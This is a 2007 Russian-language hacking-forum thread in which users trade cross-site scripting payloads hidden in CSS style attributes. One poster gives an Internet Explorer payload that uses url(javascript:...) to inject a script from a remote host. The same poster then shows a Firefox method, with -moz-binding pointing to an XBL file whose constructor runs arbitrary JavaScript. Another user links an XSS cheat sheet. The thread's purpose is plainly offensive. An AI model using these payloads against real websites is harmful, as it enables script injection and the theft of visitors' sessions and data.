XSS через style в Mozilla FireFox.

Discussion in 'Уязвимости' started by Loopy, 27 Nov 2007.

  1. Loopy

    Loopy New Member

    Joined:
    14 Jul 2007
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    Хай.
    По сабжу не подскажите?
    В IE: style="background: url(javascript:alert());", а в Мозилле, слышал про -mozilla-opacity, или как-то так..
    Нужно, чтобы в Мозилле при загрузке страницы сразу исполнялась XSS в аттрибуте style..
     
  2. Евгений Минаев

    Евгений Минаев Elder - Старейшина

    Joined:
    12 Nov 2007
    Messages:
    55
    Likes Received:
    169
    Reputations:
    159
    Попробуй так

     
    1 person likes this.
  3. Loopy

    Loopy New Member

    Joined:
    14 Jul 2007
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    Евгений Минаев
    Посмотрел этот XML, не, это жесткий метод.. сложно свободно писать Js.. Я хочю через аттрибут в стайле выполнить XSS подключающий сторонний Js-код, путём createElement..
     
  4. Loopy

    Loopy New Member

    Joined:
    14 Jul 2007
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    Быть точнее.
    style="background: url(javascript: document.createElement('script').src='http://www.mysite.ru/myscript.js');"
    Это идеально для IE, тоже самое мне нужно в Мозилле, т.к. этот код не валиден Фоксу.
     
  5. Loopy

    Loopy New Member

    Joined:
    14 Jul 2007
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    Подключил... Через биндинг..

    CSS: -moz-binding: url("http://localhost/xml.xml#xss");
    XML: <?xml version="1.0"?>
    <bindings xmlns="http://www.mozilla.org/xbl"
    xmlns:html="http://www.w3.org/1999/xhtml">
    <binding id="xss">
    <implementation>
    <constructor>
    JavaScript code...
    </constructor>
    </implementation>
    </binding>
    </bindings>
     
  6. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    http://ha.ckers.org/xss.html
     
    _________________________